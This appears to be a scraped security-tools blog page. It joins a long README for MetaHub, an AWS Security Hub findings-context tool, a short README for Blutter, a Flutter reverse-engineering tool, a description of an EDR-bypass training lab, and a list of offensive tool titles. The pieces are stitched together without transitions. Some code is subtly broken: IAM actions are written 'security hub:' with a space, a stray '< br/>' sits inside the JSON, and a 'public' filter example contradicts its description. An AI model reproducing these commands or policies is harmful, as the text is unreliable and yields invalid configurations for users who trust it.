The impact module in MetaHub focuses on generating a score for each finding based on the context of the affected resource and all the security findings affecting them. For the context, we define a series of evaluated criteria; you can add, remove, or modify these criteria based on your needs. The Impact criteria are combined with a metric generated based on all the Security Findings affecting the affected resource and their severities.
The following are the impact criteria that MetaHub evaluates by default:
Exposure
Exposure evaluates the how the the affected resource is exposed to other networks. For example, if the affected resource is public, if it is part of a VPC, if it has a public IP or if it is protected by a firewall or a security group.
Possible Statuses | Value | Description |
---|---|---|
effectively-public | 100% | The resource is effectively public from the Internet. |
restricted-public | 40% | The resource is public, but there is a restriction like a Security Group. |
unrestricted-private | 30% | The resource is private but unrestricted, like an open security group. |
launch-public | 10% | These are resources that can launch other resources as public. For example, an Auto Scaling group or a Subnet. |
restricted | 0% | The resource is restricted. |
unknown | - | The resource couldn't be checked |
Access
Access evaluates the resource policy layer. MetaHub checks every available policy including: IAM Managed policies, IAM Inline policies, Resource Policies, Bucket ACLS, and any association to other resources like IAM Roles which its policies are also analyzed . An unrestricted policy is not only an itsue itself of that policy, it afected any other resource which is using it.
Possible Statuses | Value | Description |
---|---|---|
unrestricted | 100% | The principal is unrestricted, without any condition or restriction. |
untrusted-principal | 70% | The principal is an AWS Account, not part of your trusted accounts. |
unrestricted-principal | 40% | The principal is not restricted, defined with a wildcard. It could be conditions restricting it or other restrictions like s3 public blocks. |
cross-account-principal | 30% | The principal is from another AWS account. |
unrestricted-actions | 30% | The actions are defined using wildcards. |
dangerous-actions | 30% | Some dangerous actions are defined as part of this policy. |
unrestricted-service | 10% | The policy allows an AWS service as principal without restriction. |
restricted | 0% | The policy is restricted. |
unknown | - | The policy couldn't be checked. |
Encryption
Encryption evaluate the different encryption layers based on each resource type. For example, for some resources it evaluates if at_rest
and in_transit
encryption configuration are both enabled.
Possible Statuses | Value | Description |
---|---|---|
unencrypted | 100% | The resource is not fully encrypted. |
encrypted | 0% | The resource is fully encrypted including any of it's associations. |
unknown | - | The resource encryption couldn't be checked. |
Status
Status evaluate the status of the affected resource in terms of attachment or functioning. For example, for an EC2 Instance we evaluate if the resource is running, stopped, or terminated, but for resources like EBS Volumes and Security Groups, we evaluate if those resources are attached to any other resource.
Possible Statuses | Value | Description |
---|---|---|
attached | 100% | The resource supports attachment and is attached. |
running | 100% | The resource supports running and is running. |
enabled | 100% | The resource supports enabled and is enabled. |
not-attached | 0% | The resource supports attachment, and it is not attached. |
not-running | 0% | The resource supports running and it is not running. |
not-enabled | 0% | The resource supports enabled and it is not enabled. |
unknown | - | The resource couldn't be checked for status. |
Environment
Environment evaluates the environment where the affected resource is running. By default, MetaHub defines 3 environments: production
, staging
, and development
, but you can add, remove, or modify these environments based on your needs. MetaHub evaluates the environment based on the tags of the affected resource, the account id or the account alias. You can define your own environemnts definitions and strategy in the configuration file (See Customizing Configuration).
Possible Statuses | Value | Description |
---|---|---|
production | 100% | It is a production resource. |
staging | 30% | It is a staging resource. |
development | 0% | It is a development resource. |
unknown | - | The resource couldn't be checked for enviroment. |
Application
Application evaluates the application that the affected resource is part of. MetaHub relies on the AWS myApplications feature, which relies on the Tag awsApplication
, but you can extend this functionality based on your context for example by defining other tags you use for defining applications or services (like Service
or any other), or by relying on account id or alias. You can define your application definitions and strategy in the configuration file (See Customizing Configuration).
Possible Statuses | Value | Description |
---|---|---|
unknown | - | The resource couldn't be checked for application. |
Findings Soring
As part of the impact score calculation, we also evaluate the total ammount of security findings and their severities affecting the resource. We use the following formula to calculate this metric:
(SUM of all (Finding Severity / Highest Severity) with a maximum of 1)
For example, if the affected resource has two findings affecting it, one with HIGH
and another with LOW
severity, the Impact Findings Score will be:
SUM(HIGH (3) / CRITICAL (4) + LOW (0.5) / CRITICAL (4)) = 0.875
Architecture
MetaHub reads your security findings from AWS Security Hub or any ASFF-compatible security scanner. It then queries the affected resources directly in the affected account to provide additional context. Based on that context, it calculates it's impact. Finally, it generates different outputs based on your needs.
Use Cases
Some use cases for MetaHub include:
- MetaHub integration with Prowler as a local scanner for context enrichment
- Automating Security Hub findings suppression based on Tagging
- Integrate MetaHub directly as Security Hub custom action to use it directly from the AWS Console
- Created enriched HTML reports for your findings that you can filter, sort, group, and download
- Create Security Hub Insights based on MetaHub context
Features
MetaHub provides a range of ways to list and manage security findings for investigation, suppression, updating, and integration with other tools or alerting systems. To avoid Shadowing and Duplication, MetaHub organizes related findings together when they pertain to the same resource. For more information, refer to Findings Aggregation
MetaHub queries the affected resources directly in the affected account to provide additional context using the following options:
- Config: Fetches the most important configuration values from the affected resource.
- Associations: Fetches all the associations of the affected resource, such as IAM roles, security groups, and more.
- Tags: Queries tagging from affected resources
- CloudTrail: Queries CloudTrail in the affected account to identify who created the resource and when, as well as any other related critical events
- Account: Fetches extra information from the account where the affected resource is running, such as the account name, security contacts, and other information.
MetaHub supports filters on top of these context* outputs to automate the detection of other resources with the same issues. You can filter security findings affecting resources tagged in a certain way (e.g., Environment=production
) and combine this with filters based on Config or Associations, like, for example, if the resource is public, if it is encrypted, only if they are part of a VPC, if they are using a specific IAM role, and more. For more information, refer to Config filters and Tags filters for more information.
But that's not all. If you are using MetaHub with Security Hub, you can even combine the previous filters with the Security Hub native filters (AWS Security Hub filtering). You can filter the same way you would with the AWS CLI utility using the option --sh-filters
, but in addition, you can save and re-use your filters as YAML files using the option --sh-template
.
If you prefer, With MetaHub, you can back enrich your findings directly in AWS Security Hub using the option --enrich-findings
. This action will update your AWS Security Hub findings using the field UserDefinedFields
. You can then create filters or Insights directly in AWS Security Hub and take advantage of the contextualization added by MetaHub.
When investigating findings, you may need to update security findings altogether. MetaHub also allows you to execute bulk updates to AWS Security Hub findings, such as changing Workflow Status using the option --update-findings
. As an example, you identified that you have hundreds of security findings about public resources. Still, based on the MetaHub context, you know those resources are not effectively public as they are protected by routing and firewalls. You can update all the findings for the output of your MetaHub query with one command. When updating findings using MetaHub, you also update the field Note
of your finding with a custom text for future reference.
MetaHub supports different Output Modes, some of them json based like json-inventory, json-statistics, json-short, json-full, but also powerfull html, xlsx and csv. These outputs are customizable; you can choose which columns to show. For example, you may need a report about your affected resources, adding the tag Owner, Service, and Environment and nothing else. Check the configuration file and define the columns you need.
MetaHub supports multi-account setups. You can run the tool from any environment by assuming roles in your AWS Security Hub master
account and your child/service
accounts where your resources live. This allows you to fetch aggregated data from multiple accounts using your AWS Security Hub multi-account implementation while also fetching and enriching those findings with data from the accounts where your affected resources live based on your needs. Refer to Configuring Security Hub for more information.
Customizing Configuration
MetaHub uses configuration files that let you customize some checks behaviors, default filters, and more. The configuration files are located in lib/config/.
Things you can customize:
-
lib/config/configuration.py: This file contains the default configuration for MetaHub. You can change the default filters, the default output modes, the environment definitions, and more.
-
lib/config/impact.py: This file contains the values and it's weights for the impact formula criteria. You can modify the values and the weights based on your needs.
-
lib/config/reources.py: This file contains definitions for every resource type, like which CloudTrail events to look for.
Run with Python
MetaHub is a Python3 program. You need to have Python3 installed in your system and the required Python modules described in the file requirements.txt
.
Requirements can be installed in your system manually (using pip3) or using a Python virtual environment (suggested method).
Run it using Python Virtual Environment
- Clone the repository:
git clone [email protected]:gabrielsoltz/metahub.git
- Change to repostiory dir:
cd metahub
- Create a virtual environment for this project:
python3 -m venv venv/metahub
- Activate the virtual environment you just created:
source venv/metahub/bin/activate
- Install Metahub requirements:
pip3 install -r requirements.txt
- Run:
./metahub -h
- Deactivate your virtual environment after you finish with:
deactivate
Next time, you only need steps 4 and 6 to use the program.
Alternatively, you can run this tool using Docker.
Run with Docker
MetaHub is also available as a Docker image. You can run it directly from the public Docker image or build it locally.
The available tagging for MetaHub containers are the following:
latest
: in sync with master branch<x.y.z>
: you can find the releases herestable
: this tag always points to the latest release.
For running from the public registry, you can run the following command:
docker run -ti public.ecr.aws/n2p8q5p4/metahub:latest ./metahub -h
AWS credentials and Docker
If you are already logged into the AWS host machine, you can seamlessly use the same credentials within a Docker container. You can achieve this by either passing the necessary environment variables to the container or by mounting the credentials file.
For instance, you can run the following command:
docker run -e AWS_DEFAULT_REGION -e AWS_ACCESS_KEY_ID -e AWS_SECRET_ACCESS_KEY -e AWS_SESSION_TOKEN -ti public.ecr.aws/n2p8q5p4/metahub:latest ./metahub -h
On the other hand, if you are not logged in on the host machine, you will need to log in again from within the container itself.
Build and Run Docker locally
Or you can also build it locally:
git clone [email protected]:gabrielsoltz/metahub.git
cd metahub
docker build -t metahub .
docker run -ti metahub ./metahub -h
Run with Lambda
MetaHub is Lambda/Serverless ready! You can run MetaHub directly on an AWS Lambda function without any additional infrastructure required.
Running MetaHub in a Lambda function allows you to automate its execution based on your defined triggers.
Terraform code is provided for deploying the Lambda function and all its dependencies.
Lambda use-cases
- Trigger the MetaHub Lambda function each time there is a new security finding to enrich that finding back in AWS Security Hub.
- Trigger the MetaHub Lambda function each time there is a new security finding for suppression based on Context.
- Trigger the MetaHub Lambda function to identify the affected owner of a security finding based on Context and assign it using your internal systems.
- Trigger the MetaHub Lambda function to create a ticket with enriched context.
Deploying Lambda
The terraform code for deploying the Lambda function is provided under the terraform/
folder.
Just run the following commands:
cd terraform
terraform init
terraform apply
The code will create a zip file for the lambda code and a zip file for the Python dependencies. It will also create a Lambda function and all the required resources.
Customize Lambda behaviour
You can customize MetaHub options for your lambda by editing the file lib/lambda.py. You can change the default options for MetaHub, such as the filters, the Meta* options, and more.
Lambda Permissions
Terraform will create the minimum required permissions for the Lambda function to run locally (in the same account). If you want your Lambda to assume a role in other accounts (for example, you will need this if you are executing the Lambda in the Security Hub master account that is aggregating findings from other accounts), you will need to specify the role to assume, adding the option --mh-assume-role
in the Lambda function configuration (See previous step) and adding the corresponding policy to allow the Lambda to assume that role in the lambda role.
Run with Security Hub Custom Action
MetaHub can be run as a Security Hub Custom Action. This allows you to run MetaHub directly from the Security Hub console for a selected finding or for a selected set of findings.
The custom action will then trigger a Lambda function that will run MetaHub for the selected findings. By default, the Lambda function will run MetaHub with the option --enrich-findings
, which means that it will update your finding back with MetaHub outputs. If you want to change this, see Customize Lambda behavior
You need first to create the Lambda function and then create the custom action in Security Hub.
For creating the lambda function, follow the instructions in the Run with Lambda section.
For creating the AWS Security Hub custom action:
- In Security Hub, choose Settings and then choose Custom Actions.
- Choose Create custom action.
- Provide a Name, Description, and Custom action ID for the action.
- Choose Create custom action. (Make a note of the Custom action ARN. You need to use the ARN when you create a rule to associate with this action in EventBridge.)
- In EventBridge, choose Rules and then choose Create rule.
- Enter a name and description for the rule.
- For the Event bus, choose the event bus that you want to associate with this rule. If you want this rule to match events that come from your account, select default. When an AWS service in your account emits an event, it always goes to your account's default event bus.
- For Rule type, choose a rule with an event pattern and then press Next.
- For Event source, choose AWS events.
- For the Creation method, choose Use pattern form.
- For Event source, choose AWS services.
- For AWS service, choose Security Hub.
- For Event type, choose Security Hub Findings - Custom Action.
- Choose Specific custom action ARNs and add a custom action ARN.
- Choose Next.
- Under Select targets, choose the Lambda function
- Select the Lambda function you created for MetaHub.
AWS Authentication
- Ensure you have AWS credentials set up on your local machine (or from where you will run MetaHub).
For example, you can use aws configure
option.
aws configure
Or you can export your credentials to the environment.
export AWS_DEFAULT_REGION="us-east-1"
export AWS_ACCESS_KEY_ID= "ASXXXXXXX"
export AWS_SECRET_ACCESS_KEY= "XXXXXXXXX"
export AWS_SESSION_TOKEN= "XXXXXXXXX"
Configuring Security Hub
-
If you are running MetaHub for a single AWS account setup (AWS Security Hub is not aggregating findings from different accounts), you don't need to use any additional options; MetaHub will use the credentials in your environment. Still, if your IAM design requires it, it is possible to log in and assume a role in the same account you are logged in. Just use the options
--sh-assume-role
to specify the role and--sh-account
with the same AWS Account ID where you are logged in. -
--sh-region
: The AWS Region where Security Hub is running. If you don't specify a region, it will use the one configured in your environment. If you are using AWS Security Hub Cross-Region aggregation, you should use that region as the --sh-region option so that you can fetch all findings together. -
--sh-account
and--sh-assume-role
: The AWS Account ID where Security Hub is running and the AWS IAM role to assume in that account. These options are helpful when you are logged in to a different AWS Account than the one where AWS Security Hub is running or when running AWS Security Hub in a multiple AWS Account setup. Both options must be used together. The role provided needs to have enough policies to get and update findings in AWS Security Hub (if needed). If you don't specify a--sh-account
, MetaHub will assume the one you are logged in. -
--sh-profile
: You can also provide your AWS profile name to use for AWS Security Hub. When using this option, you don't need to specify--sh-account
or--sh-assume-role
as MetaHub will use the credentials from the profile. If you are using--sh-account
and--sh-assume-role
, those options take precedence over--sh-profile
.
IAM Policy for Security Hub
This is the minimum IAM policy you need to read and write from AWS Security Hub. If you don't want to update your findings with MetaHub, you can remove the securityhub:BatchUpdateFindings
action.
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Action": [
"security hub:GetFindings",
"security hub:ListFindingAggregators",
"security hub:BatchUpdateFindings",
"iam:ListAccountAliases"
],
"Resource": [
"*"
]
}
]
}
Configuring Context
If you are running MetaHub for a multiple AWS Account setup (AWS Security Hub is aggregating findings from multiple AWS Accounts), you must provide the role to assume for Context queries because the affected resources are not in the same AWS Account that the AWS Security Hub findings. The --mh-assume-role
will be used to connect with the affected resources directly in the affected account. This role needs to have enough policies for being able to describe resources.
IAM Policy for Context
The minimum policy needed for context includes the managed policy arn:aws:iam::aws:policy/SecurityAudit
and the following actions:
tag:GetResources
lambda:GetFunction
lambda:GetFunctionUrlConfig
cloudtrail:LookupEvents
account:GetAlternateContact
organizations:DescribeAccount
iam:ListAccountAliases
Examples
Inputs
MetaHub can read security findings directly from AWS Security Hub using its API. If you don't use Security Hub, you can use any ASFF-based scanner. Most cloud security scanners support the ASFF format. Check with them or leave an issue if you need help.
If you want to read from an input ASFF file, you need to use the options:
./metahub.py --inputs file-asff --input-asff path/to/the/file.json.asff path/to/the/file2.json.asff
You also can combine AWS Security Hub findings with input ASFF files specifying both inputs:
./metahub.py --inputs file-asff securityhub --input-asff path/to/the/file.json.asff
When using a file as input, you can't use the option --sh-filters
for filter findings, as this option relies on AWS API for filtering. You can't use the options --update-findings
or --enrich-findings
as those findings are not in the AWS Security Hub. If you are reading from both sources at the same time, only the findings from AWS Security Hub will be updated.
Output Modes
MetaHub can generate different programmatic and visual outputs. By default, all output modes are enabled: json-short
, json-full
, json-statistics
, json-inventory
, html
, csv
, and xlsx
.
The outputs will be saved in the outputs/
folder with the execution date.
If you want only to generate a specific output mode, you can use the option --output-modes
with the desired output mode.
For example, if you only want to generate the output json-short
, you can use:
./metahub.py --output-modes json-short
If you want to generate json-short
, json-full
and html
outputs, you can use:
./metahub.py --output-modes json-short json-full html
JSON
JSON-Short
Show all findings titles together under each affected resource and the AwsAccountId
, Region
, and ResourceType
:
Show all findings with all data. Findings are organized by ResourceId (ARN). For each finding, you will also get: SeverityLabel,
Workflow,
RecordState,
Compliance,
Id
, and ProductArn
:
Show a list of all resources with their ARN.
Show statistics for each field/value. In the output, you will see each field/value and the number of occurrences; for example, the following output shows statistics for six findings.
You can create rich HTML reports of your findings, adding your context as part of them.
HTML Reports are interactive in many ways:
- You can add/remove columns.
- You can sort and filter by any column.
- You can auto-filter by any column
- You can group/ungroup findings
- You can also download that data to xlsx, CSV, HTML, and JSON.
CSV
You can create CSV reports of your findings, adding your context as part of them.
XLSX
Similar to CSV but with more formatting options.
Customize HTML, CSV or XLSX outputs
You can customize which Context keys to unroll as columns for your HTML, CSV, and XLSX outputs using the options --output-tag-columns
and --output-config-columns
(as a list of columns). If the keys you specified don't exist for the affected resource, they will be empty. You can also configure these columns by default in the configuration file (See Customizing Configuration).
For example, you can generate an HTML output with Tags and add "Owner" and "Environment" as columns to your report using the:
./metahub --output-modes html --output-tag-columns Owner Environment
Filters
You can filter the security findings and resources that you get from your source in different ways and combine all of them to get exactly what you are looking for, then re-use those filters to create alerts.
Security Hub Filtering
MetaHub supports filtering AWS Security Hub findings in the form of KEY=VALUE
filtering for AWS Security Hub using the option --sh-filters
, the same way you would filter using AWS CLI but limited to the EQUALS
comparison. If you want another comparison, use the option --sh-template
Security Hub Filtering using YAML templates.
You can check available filters in AWS Documentation
./metahub --sh-filters <KEY=VALUE>
If you don't specify any filters, default filters are applied: RecordState=ACTIVE WorkflowStatus=NEW
Passing filters using this option resets the default filters. If you want to add filters to the defaults, you need to specify them in addition to the default ones. For example, adding SeverityLabel to the default filters:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW
If a value contains spaces, you should specify it using double quotes: "ProductName="Security Hub"
You can add how many different filters you need to your query and also add the same filter key with different values:
Examples:
- Filter by Severity (CRITICAL):
./metaHub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW SeverityLabel=CRITICAL
- Filter by Severity (CRITICAL and HIGH):
./metaHub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW SeverityLabel=CRITICAL SeverityLabel=HIGH
- Filter by Severity and AWS Account:
./metaHub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW SeverityLabel=CRITICAL AwsAccountId=1234567890
- Filter by Check Title:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW Title="EC2.22 Unused EC2 security groups should be removed"
- Filter by AWS Resource Type:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsEc2SecurityGroup
- Filter by Resource ID:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceId="arn:aws:ec2:eu-west-1:01234567890:security-group/sg-01234567890"
- Filter by Finding Id:
./metahub --sh-filters Id="arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.19/finding/01234567890-1234-1234-1234-01234567890"
- Filter by Compliance Status:
./metahub --sh-filters ComplianceStatus=FAILED
Security Hub Filtering using YAML templates
MetaHub lets you create complex filters using YAML files (templates) that you can re-use when needed. YAML templates let you write filters using any comparison supported by AWS Security Hub like "EQUALS' | 'PREFIX' | 'NOT_EQUALS' | 'PREFIX_NOT_EQUALS". You can call your YAML file using the option --sh-template <<FILE>>
.
You can find examples under the folder templates
- Filter using YAML template default.yml:
./metaHub --sh-template templates/default.yml
Config Filters
MetaHub supports Config filters (and associations) using KEY=VALUE
where the value can only be True
or False
using the option --mh-filters-config
. You can use as many filters as you want and separate them using spaces. If you specify more than one filter, you will get all resources that match all filters.
Config filters only support True
or False
values:
- A Config filter set to True means
True
or with data. - A Config filter set to False means
False
or without data.
Config filters run after AWS Security Hub filters:
- MetaHub fetches AWS Security Findings based on the filters you specified using
--sh-filters
(or the default ones). - MetaHub executes Context for the AWS-affected resources based on the previous list of findings
- MetaHub only shows you the resources that match your
--mh-filters-config
, so it's a subset of the resources from point 1.
Examples:
- Get all Security Groups (
ResourceType=AwsEc2SecurityGroup
) with AWS Security Hub findings that are ACTIVE and NEW (RecordState=ACTIVE WorkflowStatus=NEW
) only if they are associated to Network Interfaces (network_interfaces=True
):
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsEc2SecurityGroup --mh-filters-config network_interfaces=True
- Get all S3 Buckets (
ResourceType=AwsS3Bucket
) only if they are public (public=True
):
./metahub --sh-filters ResourceType=AwsS3Bucket --mh-filters-config public=False
Tags Filters
MetaHub supports Tags filters in the form of KEY=VALUE
where KEY is the Tag name and value is the Tag Value. You can use as many filters as you want and separate them using spaces. Specifying multiple filters will give you all resources that match at least one filter.
Tags filters run after AWS Security Hub filters:
- MetaHub fetches AWS Security Findings based on the filters you specified using
--sh-filters
(or the default ones). - MetaHub executes Tags for the AWS-affected resources based on the previous list of findings
- MetaHub only shows you the resources that match your
--mh-filters-tags
, so it's a subset of the resources from point 1.
Examples:
- Get all Security Groups (
ResourceType=AwsEc2SecurityGroup
) with AWS Security Hub findings that are ACTIVE and NEW (RecordState=ACTIVE WorkflowStatus=NEW
) only if they are tagged with a tagEnvironment
and valueProduction
:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsEc2SecurityGroup --mh-filters-tags Environment=Production
Updating Workflow Status
You can use MetaHub to update your AWS Security Hub Findings workflow status (NOTIFIED,
NEW,
RESOLVED,
SUPPRESSED
) with a single command. You will use the --update-findings
option to update all the findings from your MetaHub query. This means you can update one, ten, or thousands of findings using only one command. AWS Security Hub API is limited to 100 findings per update. Metahub will split your results into 100 items chucks to avoid this limitation and update your findings beside the amount.
For example, using the following filter: ./metahub --sh-filters ResourceType=AwsSageMakerNotebookInstance RecordState=ACTIVE WorkflowStatus=NEW
I found two affected resources with three finding each making six Security Hub findings in total.
Running the following update command will update those six findings' workflow status to NOTIFIED
with a Note:
./metahub --update-findings Workflow=NOTIFIED Note="Enter your ticket ID or reason here as a note that you will add to the finding as part of this update."
The --update-findings
will ask you for confirmation before updating your findings. You can skip this confirmation by using the option --no-actions-confirmation
.
Enriching Findings
You can use MetaHub to enrich back your AWS Security Hub Findings with Context outputs using the option --enrich-findings
. Enriching your findings means updating them directly in AWS Security Hub. MetaHub uses the UserDefinedFields
field for this.
By enriching your findings directly in AWS Security Hub, you can take advantage of features like Insights and Filters by using the extra information not available in Security Hub before.
For example, you want to enrich all AWS Security Hub findings with WorkflowStatus=NEW
, RecordState=ACTIVE
, and ResourceType=AwsS3Bucket
that are public=True
with Context outputs:
./metahub --sh-filters RecordState=ACTIVE WorkflowStatus=NEW ResourceType=AwsS3Bucket --mh-filters-checks public=True --enrich-findings
The --enrich-findings
will ask you for confirmation before enriching your findings. You can skip this confirmation by using the option --no-actions-confirmation
.
Findings Aggregation
Working with Security Findings sometimes introduces the problem of Shadowing and Duplication.
Shadowing is when two checks refer to the same issue, but one in a more generic way than the other one.
Duplication is when you use more than one scanner and get the same problem from more than one.
Think of a Security Group with port 3389/TCP open to 0.0.0.0/0. Let's use Security Hub findings as an example.
If you are using one of the default Security Standards like AWS-Foundational-Security-Best-Practices,
you will get two findings for the same issue:
EC2.18 Security groups should only allow unrestricted incoming traffic for authorized ports
EC2.19 Security groups should not allow unrestricted access to ports with high risk
If you are also using the standard CIS AWS Foundations Benchmark, you will also get an extra finding:
4.2 Ensure no security groups allow ingress from 0.0.0.0/0 to port 3389
Now, imagine that SG is not in use. In that case, Security Hub will show an additional fourth finding for your resource!
EC2.22 Unused EC2 security groups should be removed
So now you have in your dashboard four findings for one resource!
Suppose you are working with multi-account setups and many resources. In that case, this could result in many findings that refer to the same thing without adding any extra value to your analysis.
MetaHub aggregates security findings under the affected resource.
This is how MetaHub shows the previous example with output-mode json-short:
"arn:aws:ec2:eu-west-1:01234567890:security-group/sg-01234567890": {
"findings": [
"EC2.19 Security groups should not allow unrestricted access to ports with high risk",
"EC2.18 Security groups should only allow unrestricted incoming traffic for authorized ports",
"4.2 Ensure no security groups allow ingress from 0.0.0.0/0 to port 3389",
"EC2.22 Unused EC2 security groups should be removed"
],
"AwsAccountId": "01234567890",
"Region": "eu-west-1",
"ResourceType": "AwsEc2SecurityGroup"
}
This is how MetaHub shows the previous example with output-mode json-full:
"arn:aws:ec2:eu-west-1:01234567890:security-group/sg-01234567890": {
"findings": [
{
"EC2.19 Security groups should not allow unrestricted access to ports with high risk": {
"SeverityLabel": "CRITICAL",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",
"Compliance": {
"Status": "FAILED"
},
"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
},
{
"EC2.18 Security groups should only allow unrestricted incoming traffic for authorized ports": {
"SeverityLabel": "HIGH",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",< br/> "Compliance": {
"Status": "FAILED"
},
"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
},
{
"4.2 Ensure no security groups allow ingress from 0.0.0.0/0 to port 3389": {
"SeverityLabel": "HIGH",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",
"Compliance": {
"Status": "FAILED"
},
"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
},
{
"EC2.22 Unused EC2 security groups should be removed": {
"SeverityLabel": "MEDIUM",
"Workflow": {
"Status": "NEW"
},
"RecordState": "ACTIVE",
"Compliance": {
"Status": "FAILED"
},
"Id": "arn:aws:security hub:eu-west-1:01234567890:subscription/aws-foundational-security-best-practices/v/1.0.0/EC2.22/finding/01234567890-1234-1234-1234-01234567890",
"ProductArn": "arn:aws:security hub:eu-west-1::product/aws/security hub"
}
}
],
"AwsAccountId": "01234567890",
"AwsAccountAlias": "obfuscated",
"Region": "eu-west-1",
"ResourceType": "AwsEc2SecurityGroup"
}
Your findings are combined under the ARN of the resource affected, ending in only one result or one non-compliant resource.
You can now work in MetaHub with all these four findings together as if they were only one. For example, you can update these four Workflow Status findings using only one command: See Updating Workflow Status
Contributing
You can follow this guide if you want to contribute to the Context module guide.
Blutter - Flutter Mobile Application Reverse Engineering Tool
Flutter Mobile Application Reverse Engineering Tool by Compiling Dart AOT Runtime
Currently the application supports only Android libapp.so (arm64 only). Also the application is currently work only against recent Dart versions.
For high priority missing features, see TODO
Environment Setup
This application uses C++20 Formatting library. It requires very recent C++ compiler such as g++>=13, Clang>=15.
I recommend using Linux OS (only tested on Deiban sid/trixie) because it is easy to setup.
Debian Unstable (gcc 13)
- Install build tools and depenencies
apt install python3-pyelftools python3-requests git cmake ninja-build \
build-essential pkg-config libicu-dev libcapstone-dev
Windows
- Install git and python 3
- Install latest Visual Studio with "Desktop development with C++" and "C++ CMake tools"
- Install required libraries (libcapstone and libicu4c)
python scripts\init_env_win.py
- Start "x64 Native Tools Command Prompt"
macOS Ventura (clang 15)
- Install XCode
- Install clang 15 and required tools
brew install llvm@15 cmake ninja pkg-config icu4c capstone
pip3 install pyelftools requests
Usage
Extract "lib" directory from apk file
python3 blutter.py path/to/app/lib/arm64-v8a out_dir
The blutter.py will automatically detect the Dart version from the flutter engine and call executable of blutter to get the information from libapp.so.
If the blutter executable for required Dart version does not exists, the script will automatically checkout Dart source code and compiling it.
Update
You can use git pull
to update and run blutter.py with --rebuild
option to force rebuild the executable
python3 blutter.py path/to/app/lib/arm64-v8a out_dir --rebuild
Output files
- asm/* libapp assemblies with symbols
- blutter_frida.js the frida script template for the target application
- objs.txt complete (nested) dump of Object from Object Pool
- pp.txt all Dart objects in Object Pool
Directories
- bin contains blutter executables for each Dart version in "blutter_dartvm<ver>_<os>_<arch>" format
- blutter contains source code. need building against Dart VM library
- build contains building projects which can be deleted after finishing the build process
- dartsdk contains checkout of Dart Runtime which can be deleted after finishing the build process
- external contains 3rd party libraries for Windows only
- packages contains the static libraries of Dart Runtime
- scripts contains python scripts for getting/building Dart
Generating Visual Studio Solution for Development
I use Visual Studio to delevlop Blutter on Windows. --vs-sln
options can be used to generate a Visual Studio solution.
python blutter.py path\to\lib\arm64-v8a build\vs --vs-sln
TODO
- More code analysis
- Function arguments and return type
- Some psuedo code for code pattern
- Generate better Frida script
- More internal classes
- Object modification
- Obfuscated app (still missing many functions)
- Reading iOS binary
- Input as apk or ipa
- KitPloit - PenTest & Hacking Tools
- BestEdrOfTheMarket - Little AV/EDR Bypassing Lab For Training And Learning Purposes
BestEdrOfTheMarket - Little AV/EDR Bypassing Lab For Training And Learning Purposes
Little AV/EDR Evasion Lab for training & learning purposes. (️ under construction..)
____ _ _____ ____ ____ ___ __ _____ _
| __ ) ___ ___| |_ | ____| _ \| _ \ / _ \ / _| |_ _| |__ ___
| _ \ / _ \/ __| __| | _| | | | | |_) | | | | | |_ | | | '_ \ / _ \
| |_) | __/\__ \ |_ | |___| |_| | _ < | |_| | _| | | | | | | __/
|____/_\___||___/\__| |_____|____/|_| \_\ \___/|_| |_| |_| |_|\___|
| \/ | __ _ _ __| | _____| |_
| |\/| |/ _` | '__| |/ / _ \ __|
| | | | (_| | | | < __/ |_ Yazidou - github.com/Xacone
|_| |_|\__,_|_| |_|\_\___|\__|
BestEDROfTheMarket is a naive user-mode EDR (Endpoint Detection and Response) project, designed to serve as a testing ground for understanding and bypassing EDR's user-mode detection methods that are frequently used by these security solutions.
These techniques are mainly based on a dynamic analysis of the target process state (memory, API calls, etc.),
Feel free to check this short article I wrote that describe the interception and analysis methods implemented by the EDR.
Defensive Techniques
- Multi-Levels API Hooking
- SSN Hooking/Crushing
- IAT Hooking
- Shellcode Injection Detection
- Reflective Module Loading Detection
- Call Stack Monitoring
In progress:
Usage
Usage: BestEdrOfTheMarket.exe [args]
/help Shows this help message and quit
/v Verbosity
/iat IAT hooking
/stack Threads call stack monitoring
/nt Inline Nt-level hooking
/k32 Inline Kernel32/Kernelbase hooking
/ssn SSN crushing
BestEdrOfTheMarket.exe /stack /v /k32
BestEdrOfTheMarket.exe /stack /nt
BestEdrOfTheMarket.exe /iat
Top 20 Most Popular Hacking Tools in 2023
- PhoneSploit-Pro - An All-In-One Hacking Tool To Remotely Exploit Android Devices Using ADB And Metasploit-Framework To Get A Meterpreter Session
- Gmailc2 - A Fully Undetectable C2 Server That Communicates Via Google SMTP To Evade Antivirus Protections And Network Traffic Restrictions
- Faraday - Open Source Vulnerability Management Platform
- CloakQuest3r - Uncover The True IP Address Of Websites Safeguarded By Cloudflare
- Killer - Is A Tool Created To Evade AVs And EDRs Or Security Tools
- Geowifi - Search WiFi Geolocation Data By BSSID And SSID On Different Public Databases
- Waf-Bypass - Check Your WAF Before An Attacker Does
- PentestGPT - A GPT-empowered Penetration Testing Tool
- Sirius - First Truly Open-Source General Purpose Vulnerability Scanner
